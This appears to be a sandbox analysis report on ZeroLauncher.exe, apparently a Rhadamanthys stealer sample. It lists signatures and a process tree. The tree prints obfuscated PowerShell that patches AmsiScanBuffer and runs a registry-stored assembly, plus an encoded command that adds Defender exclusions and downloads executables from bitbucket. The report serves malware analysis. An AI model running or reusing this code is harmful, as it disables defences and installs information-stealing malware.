Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

ZeroLauncher.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04/10/2024, 04:54 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ZeroLauncher.exe

  • Size

    19KB

  • MD5

    982e4ae4559538cfb529dfaff0507880

  • SHA1

    a3b0e3989d6e40792134286e40448004ebeda077

  • SHA256

    95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd

  • SHA512

    35d23d332c0389b3d3e7086613e60d73c158a7dd408bc4320ccb10aba8c2755ea99bf0d484cd257d53d42a6fe95a9bab0c606e7c580039aa5334767a4096662f

  • SSDEEP

    384:/LVHmcPXblyCKGK9dnORWsK7PPZzcuIYZKJHtZW39cDpbJO:/hHHPbICKJEW7PPeQKy6db

Score
10/10
rhadamanthysdefense_evasiondiscoveryevasionexecutionpersistencestealer

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
    evasion
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

    stealerrhadamanthys
  • Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Executes dropped EXE 4 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Power Settings 1 TTPs 5 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:644
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:568
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{16c568ad-859b-4e98-a696-079e26fda204}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3068
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:704
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:996
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:1040
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1048
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:1056
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1068
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1148
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1240
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:OoMoNckCdKTa{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TiMQfqAVAgdDjj,[Parameter(Position=1)][Type]$HhbghgOGii)$vuWolfbRzFC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+''+'p'+'e',''+'C'+''+'l'+''+'a'+'ss,'+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+'d'+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'a'+'s'+'s'+[Char](44)+''+[Char](65)+'uto'+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$vuWolfbRzFC.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+'e'+''+'c'+'i'+[Char](97)+''+[Char](108)+''+'N'+'ame,Hi'+[Char](100)+'eBy'+[Char](83)+'i'+[Char](103)+','+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TiMQfqAVAgdDjj).SetImplementationFlags('Ru'+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$vuWolfbRzFC.DefineMethod('I'+[Char](110)+'v'+[Char](111)+'ke','P'+'u'+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+','+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+'u'+'a'+[Char](108)+'',$HhbghgOGii,$TiMQfqAVAgdDjj).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $vuWolfbRzFC.CreateType();}$tikQZhgyZzvtj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+'t'+[Char](101)+'m'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'cr'+'o'+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+'W'+'i'+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](116)+'ik'+'Q'+''+'Z'+''+[Char](104)+'gy'+[Char](90)+''+[Char](122)+''+[Char](118)+'t'+[Char](106)+'');$tSwHRRtrQPlCfm=$tikQZhgyZzvtj.GetMethod(''+'t'+'S'+[Char](119)+''+'H'+''+'R'+'R'+[Char](116)+''+'r'+''+'Q'+''+'P'+''+[Char](108)+''+[Char](67)+'f'+'m'+'',[Reflection.BindingFlags]'P'+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'a'+'t'+''+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eJzcvuchBDLCedjfDPo=OoMoNckCdKTa @([String])([IntPtr]);$MqsjxbDDMdHEZyKYEFkaNV=OoMoNckCdKTa @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KEBQyiZfVHJ=$tikQZhgyZzvtj.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$orDAFkbpSsgZiT=$tSwHRRtrQPlCfm.Invoke($Null,@([Object]$KEBQyiZfVHJ,[Object](''+[Char](76)+'o'+'a'+'dLi'+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$GnZMUfwHGMDeKbFnX=$tSwHRRtrQPlCfm.Invoke($Null,@([Object]$KEBQyiZfVHJ,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+''+'P'+'r'+'o'+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$RoYHSob=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($orDAFkbpSsgZiT,$eJzcvuchBDLCedjfDPo).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+'.d'+[Char](108)+''+[Char](108)+'');$mTavQYKWrySbMCouL=$tSwHRRtrQPlCfm.Invoke($Null,@([Object]$RoYHSob,[Object](''+[Char](65)+''+'m'+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+'Buf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$JyBgUepfnL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GnZMUfwHGMDeKbFnX,$MqsjxbDDMdHEZyKYEFkaNV).Invoke($mTavQYKWrySbMCouL,[uint32]8,4,[ref]$JyBgUepfnL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$mTavQYKWrySbMCouL,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GnZMUfwHGMDeKbFnX,$MqsjxbDDMdHEZyKYEFkaNV).Invoke($mTavQYKWrySbMCouL,[uint32]8,0x20,[ref]$JyBgUepfnL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+'WAR'+[Char](69)+'').GetValue('d'+[Char](105)+'a'+[Char](108)+'er'+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                        2⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        PID:552
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:432
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WzXMwGsYcsrk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WRWCLyLgSXYTYz,[Parameter(Position=1)][Type]$nvLwKBJEcy)$zYpVtyJnWZD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+''+'r'+'y'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+'t'+'e'+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'','C'+'l'+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+'l'+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$zYpVtyJnWZD.DefineConstructor(''+'R'+'T'+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+'a'+[Char](108)+'Na'+'m'+''+'e'+','+'H'+'i'+[Char](100)+''+[Char](101)+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$WRWCLyLgSXYTYz).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+''+'M'+'a'+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');$zYpVtyJnWZD.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'NewS'+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$nvLwKBJEcy,$WRWCLyLgSXYTYz).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+'a'+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $zYpVtyJnWZD.CreateType();}$xyTjdRLMLpfuv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](120)+''+[Char](121)+''+[Char](84)+'j'+[Char](100)+''+[Char](82)+''+[Char](76)+''+'M'+''+[Char](76)+''+'p'+'fu'+[Char](118)+'');$OHeGrmYKcmJosw=$xyTjdRLMLpfuv.GetMethod(''+[Char](79)+''+'H'+'e'+[Char](71)+'r'+'m'+'Y'+[Char](75)+''+[Char](99)+'m'+'J'+'o'+[Char](115)+''+'w'+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+'t'+[Char](97)+'t'+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ufkvVzHlnmRDMZKtvnV=WzXMwGsYcsrk @([String])([IntPtr]);$icPkYZJUWRVGtqdhHmAMfU=WzXMwGsYcsrk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gHhIpPOHgvX=$xyTjdRLMLpfuv.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+''+'n'+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rn'+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$tapQFYLEsRxHpQ=$OHeGrmYKcmJosw.Invoke($Null,@([Object]$gHhIpPOHgvX,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+'ib'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+'A')));$EtSYkJgqYMpkeIgEL=$OHeGrmYKcmJosw.Invoke($Null,@([Object]$gHhIpPOHgvX,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$VNzDdDF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tapQFYLEsRxHpQ,$ufkvVzHlnmRDMZKtvnV).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$gmIFsyNIDmCxdIBvA=$OHeGrmYKcmJosw.Invoke($Null,@([Object]$VNzDdDF,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+[Char](97)+''+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$EMMGihlwiS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EtSYkJgqYMpkeIgEL,$icPkYZJUWRVGtqdhHmAMfU).Invoke($gmIFsyNIDmCxdIBvA,[uint32]8,4,[ref]$EMMGihlwiS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$gmIFsyNIDmCxdIBvA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EtSYkJgqYMpkeIgEL,$icPkYZJUWRVGtqdhHmAMfU).Invoke($gmIFsyNIDmCxdIBvA,[uint32]8,0x20,[ref]$EMMGihlwiS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+'T'+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+'l'+'e'+''+'r'+''+[Char](115)+'t'+'a'+''+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:3968
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:616
                          • C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                            C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
                            2⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:4656
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                          1⤵
                            PID:1252
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1332
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1400
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1492
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:700
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                    1⤵
                                    • Indicator Removal: Clear Windows Event Logs
                                    PID:1608
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                    1⤵
                                      PID:1644
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1660
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1668
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1748
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1828
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1860
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1136
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1708
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1808
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2064
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:2076
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2204
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2244
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p
                                                              1⤵
                                                                PID:2380
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2388
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2428
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2476
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2500
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2516
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2552
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                            1⤵
                                                                              PID:2564
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2572
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:1076
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                  1⤵
                                                                                    PID:2776
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                      PID:3328
                                                                                      • C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe"
                                                                                        2⤵
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4252
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcgB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdQBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUALwBTAGUAcgB2AGUAcgAgAGkAcwAgAGEAbABsAG8AdwBlAGQAIQAgAFQAcgB5ACAAcgB1AG4AbgBpAG4AZwAgAG8AbgAgAGEAIABkAGkAZgBmAGUAcgBlAG4AdAAgAGQAZQB2AGkAYwBlACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAawBrACMAPgA7ACIAOwA8ACMAZQBmAHIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHAAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBuAHoAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAHEAZAAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvADUAOQA0ADAAagBnADkAOAAzADQALwBnAGYAMwA0ADQAMwBmADMALwByAGEAdwAvADAAYQBkAGYAYQBlAGYANABmADgANAA3AGEAMQA3AGUAYQA0AGUANABmADYANQA2AGQAYwBkADgANQBlADcANgAyADkAMwA3ADgAMABlAGQALwBEAC4AZQB4AGUAJwAsACAAPAAjAHAAagB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBjAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeQBjAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQApADwAIwBiAGcAawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAGkAdABiAHUAYwBrAGUAdAAuAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAG8AcgBnAC8AcgBlAGMAaABlAGEAdABzAGQAaQByAGUAYwB0AC8AcgBhAHcALwAwADAAZQBiADIAZAAwAGIANAAzADYANQA5ADEAZgBjAGUAMQAxADUAMwBiAGEAYwBhADcANgAyADUAMAA5AGUANwA2ADIAZgAyAGMAZQA0AC8AQwBMAFAALgBlAHgAZQAnACwAIAA8ACMAcwBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBoAHEAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBrAHcAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBDAGgAZQBjAGsALgBlAHgAZQ